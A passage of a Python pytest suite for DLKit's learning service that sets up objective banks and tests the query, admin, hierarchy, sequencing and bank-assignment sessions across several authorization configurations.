def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_query_session_class_fixture", "objective_query_session_test_fixture")
class TestObjectiveQuerySession(object):
"""Tests for ObjectiveQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_objectives(self):
"""Tests can_search_objectives"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_objectives(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_objective_query(self):
"""Tests get_objective_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_objective_query()
assert isinstance(query, ABCQueries.ObjectiveQuery)
def test_get_objectives_by_query(self):
"""Tests get_objectives_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_objective_query()
query.match_display_name('orange')
assert self.catalog.get_objectives_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_objectives_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_query(FakeQuery())
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_admin_session_class_fixture(request):
# From test_templates/resource.py::ResourceAdminSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.assessment_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_admin_session_test_fixture(request):
# From test_templates/resource.py::ResourceAdminSession::init_template
if not is_never_authz(request.cls.service_config):
request.cls.form = request.cls.catalog.get_objective_form_for_create([])
request.cls.form.display_name = 'new Objective'
request.cls.form.description = 'description of Objective'
request.cls.form.set_genus_type(NEW_TYPE)
request.cls.osid_object = request.cls.catalog.create_objective(request.cls.form)
request.cls.session = request.cls.catalog
def test_tear_down():
# From test_templates/resource.py::ResourceAdminSession::init_template
if not is_never_authz(request.cls.service_config):
request.cls.catalog.delete_objective(request.cls.osid_object.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_admin_session_class_fixture", "objective_admin_session_test_fixture")
class TestObjectiveAdminSession(object):
"""Tests for ObjectiveAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_objectives(self):
"""Tests can_create_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_objectives(), bool)
def test_can_create_objective_with_record_types(self):
"""Tests can_create_objective_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_objective_with_record_types(DEFAULT_TYPE), bool)
def test_get_objective_form_for_create(self):
"""Tests get_objective_form_for_create"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_create_template
if not is_never_authz(self.service_config):
form = self.catalog.get_objective_form_for_create([])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_create([1])
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_objective_form_for_create([])
def test_create_objective(self):
"""Tests create_objective"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Objective
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Objective)
assert self.osid_object.display_name.text == 'new Objective'
assert self.osid_object.description.text == 'description of Objective'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_objective(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_objective('I Will Break You!')
update_form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_objective(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_objective('foo')
def test_can_update_objectives(self):
"""Tests can_update_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_objectives(), bool)
def test_get_objective_form_for_update(self):
"""Tests get_objective_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_objective_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.Objective',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_objective_form_for_update(self.fake_id)
def test_update_objective(self):
"""Tests update_objective"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Objective
form = self.catalog.get_objective_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_objective(form)
assert isinstance(updated_object, Objective)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_objective(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_objective('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_objective(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_objective('foo')
def test_can_delete_objectives(self):
"""Tests can_delete_objectives"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_objectives(), bool)
def test_delete_objective(self):
"""Tests delete_objective"""
# From test_templates/learning.py::ObjectiveAdminSession::delete_objective_template
if not is_never_authz(self.service_config):
results = self.catalog.get_objectives()
assert results.available() == 1
form = self.catalog.get_objective_form_for_create([])
form.display_name = 'new Objective'
form.description = 'description of Objective'
new_objective = self.catalog.create_objective(form)
results = self.catalog.get_objectives()
assert results.available() == 2
self.session.delete_objective(new_objective.ident)
results = self.catalog.get_objectives()
assert results.available() == 1
assert str(results.next().ident) != str(new_objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_objective(self.fake_id)
def test_can_manage_objective_aliases(self):
"""Tests can_manage_objective_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_objective_aliases(), bool)
def test_alias_objective(self):
"""Tests alias_objective"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_objective(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_objective(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_objective(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_hierarchy_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveHierarchySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_hierarchy_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_hierarchy_session_test_fixture(request):
request.cls.child_list = list()
request.cls.child_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveHierarchySession Lookup'
create_form.description = 'Test Objective for ObjectiveHierarchySession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
request.cls.catalog.add_root_objective(request.cls.objective.ident)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveHierarchySession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.child_list.append(obj)
request.cls.child_ids.append(obj.ident)
request.cls.catalog.add_child_objective(request.cls.objective.ident, obj.ident)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.catalog.remove_child_objectives(request.cls.objective.ident)
request.cls.catalog.remove_root_objective(request.cls.objective.ident)
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_hierarchy_session_class_fixture", "objective_hierarchy_session_test_fixture")
class TestObjectiveHierarchySession(object):
"""Tests for ObjectiveHierarchySession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_access_objective_hierarchy(self):
"""Tests can_access_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_access_objective_hierarchy()
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_get_root_objective_ids(self):
"""Tests get_root_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_root_objective_ids()
def test_get_root_objectives(self):
"""Tests get_root_objectives"""
if not is_never_authz(self.service_config):
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
assert isinstance(roots, ObjectiveList)
assert str(roots.next().ident) == str(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_root_objectives()
def test_has_parent_objectives(self):
"""Tests has_parent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.has_parent_objectives(True)
def test_is_parent_of_objective(self):
"""Tests is_parent_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_parent_of_objective(True, True)
def test_get_parent_objective_ids(self):
"""Tests get_parent_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_parent_objective_ids(True)
def test_get_parent_objectives(self):
"""Tests get_parent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_parent_objectives(True)
def test_is_ancestor_of_objective(self):
"""Tests is_ancestor_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_ancestor_of_objective(True, True)
def test_has_child_objectives(self):
"""Tests has_child_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.has_child_objectives(True)
def test_is_child_of_objective(self):
"""Tests is_child_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_child_of_objective(True, True)
def test_get_child_objective_ids(self):
"""Tests get_child_objective_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_child_objective_ids(True)
def test_get_child_objectives(self):
"""Tests get_child_objectives"""
if not is_never_authz(self.service_config):
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 2
assert isinstance(children, ObjectiveList)
assert str(children.next().ident) == str(self.child_ids[0])
assert str(children.next().ident) == str(self.child_ids[1])
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_child_objectives(self.fake_id)
def test_is_descendant_of_objective(self):
"""Tests is_descendant_of_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_descendant_of_objective(True, True)
def test_get_objective_node_ids(self):
"""Tests get_objective_node_ids"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_node_ids(True, True, True, True)
def test_get_objective_nodes(self):
"""Tests get_objective_nodes"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_nodes(True, True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_hierarchy_design_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveHierarchyDesignSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_hierarchy_design_session_test_fixture(request):
request.cls.child_list = list()
request.cls.child_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveHierarchyDesignSession Lookup'
create_form.description = 'Test Objective for ObjectiveHierarchyDesignSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveHierarchyDesignSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.child_list.append(obj)
request.cls.child_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_hierarchy_design_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_hierarchy_design_session_class_fixture", "objective_hierarchy_design_session_test_fixture")
class TestObjectiveHierarchyDesignSession(object):
"""Tests for ObjectiveHierarchyDesignSession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_modify_objective_hierarchy(self):
"""Tests can_modify_objective_hierarchy"""
assert isinstance(self.catalog.can_modify_objective_hierarchy(), bool)
def test_add_root_objective(self):
"""Tests add_root_objective"""
if not is_never_authz(self.service_config):
roots = self.catalog.get_root_objectives()
assert roots.available() == 0
assert isinstance(roots, ObjectiveList)
self.catalog.add_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_root_objective(self.fake_id)
def test_remove_root_objective(self):
"""Tests remove_root_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 1
self.catalog.remove_root_objective(self.objective.ident)
roots = self.catalog.get_root_objectives()
assert roots.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_root_objective(self.fake_id)
def test_add_child_objective(self):
"""Tests add_child_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 1
assert isinstance(children, ObjectiveList)
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_child_objective(self.fake_id, self.fake_id)
def test_remove_child_objective(self):
"""Tests remove_child_objective"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 1
self.catalog.remove_child_objective(self.objective.ident, self.child_ids[0])
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective(self.fake_id, self.fake_id)
def test_remove_child_objectives(self):
"""Tests remove_child_objectives"""
if not is_never_authz(self.service_config):
self.catalog.add_root_objective(self.objective.ident)
self.catalog.add_child_objective(self.objective.ident, self.child_ids[0])
self.catalog.add_child_objective(self.objective.ident, self.child_ids[1])
children = self.catalog.get_child_objectives(self.objective.ident)
assert children.available() == 2
self.catalog.remove_child_objectives(self.objective.ident)
with pytest.raises(errors.IllegalState):
self.catalog.get_child_objectives(self.objective.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objectives(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_sequencing_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.child_list = list()
request.cls.child_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveSequencingSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_sequencing_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_sequencing_session_test_fixture(request):
request.cls.objective_list = list()
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveSequencingSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj_id in request.cls.child_ids:
request.cls.catalog.delete_objective(obj_id)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_sequencing_session_class_fixture", "objective_sequencing_session_test_fixture")
class TestObjectiveSequencingSession(object):
"""Tests for ObjectiveSequencingSession"""
def test_get_objective_hierarchy_id(self):
"""Tests get_objective_hierarchy_id"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy_id()
def test_get_objective_hierarchy(self):
"""Tests get_objective_hierarchy"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_hierarchy()
def test_can_sequence_objectives(self):
"""Tests can_sequence_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_sequence_objectives()
def test_move_objective_ahead(self):
"""Tests move_objective_ahead"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.move_objective_ahead(True, True, True)
def test_move_objective_behind(self):
"""Tests move_objective_behind"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.move_objective_behind(True, True, True)
def test_sequence_objectives(self):
"""Tests sequence_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.sequence_objectives(True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_objective_bank_session_class_fixture(request):
# From test_templates/resource.py::ResourceBinSession::init_template
request.cls.service_config = request.param
request.cls.objective_list = list()
request.cls.objective_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ObjectiveObjectiveBankSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveObjectiveBankSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
request.cls.svc_mgr.assign_objective_to_objective_bank(
request.cls.objective_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.assign_objective_to_objective_bank(
request.cls.objective_ids[2], request.cls.assigned_catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.unassign_objective_from_objective_bank(
request.cls.objective_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.unassign_objective_from_objective_bank(
request.cls.objective_ids[2], request.cls.assigned_catalog.ident)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_objective_bank_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_objective_bank_session_class_fixture", "objective_objective_bank_session_test_fixture")
class TestObjectiveObjectiveBankSession(object):
"""Tests for ObjectiveObjectiveBankSession"""
def test_can_lookup_objective_objective_bank_mappings(self):
"""Tests can_lookup_objective_objective_bank_mappings"""
# From test_templates/resource.py::ResourceBinSession::can_lookup_resource_bin_mappings
result = self.session.can_lookup_objective_objective_bank_mappings()
assert isinstance(result, bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_objective_ids_by_objective_bank(self):
"""Tests get_objective_ids_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bin_template
if not is_never_authz(self.service_config):
objects = self.svc_mgr.get_objective_ids_by_objective_bank(self.assigned_catalog.ident)
assert objects.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_ids_by_objective_bank(self.fake_id)
def test_get_objectives_by_objective_bank(self):
"""Tests get_objectives_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bin_template
if not is_never_authz(self.service_config):
results = self.session.get_objectives_by_objective_bank(self.assigned_catalog.ident)
assert isinstance(results, ABCObjects.ObjectiveList)
assert results.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_objective_bank(self.fake_id)
def test_get_objective_ids_by_objective_banks(self):
"""Tests get_objective_ids_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
object_ids = self.session.get_objective_ids_by_objective_banks(catalog_ids)
assert isinstance(object_ids, IdList)
        # Currently our impl does not remove duplicate objective Ids
assert object_ids.available() == 5
else:
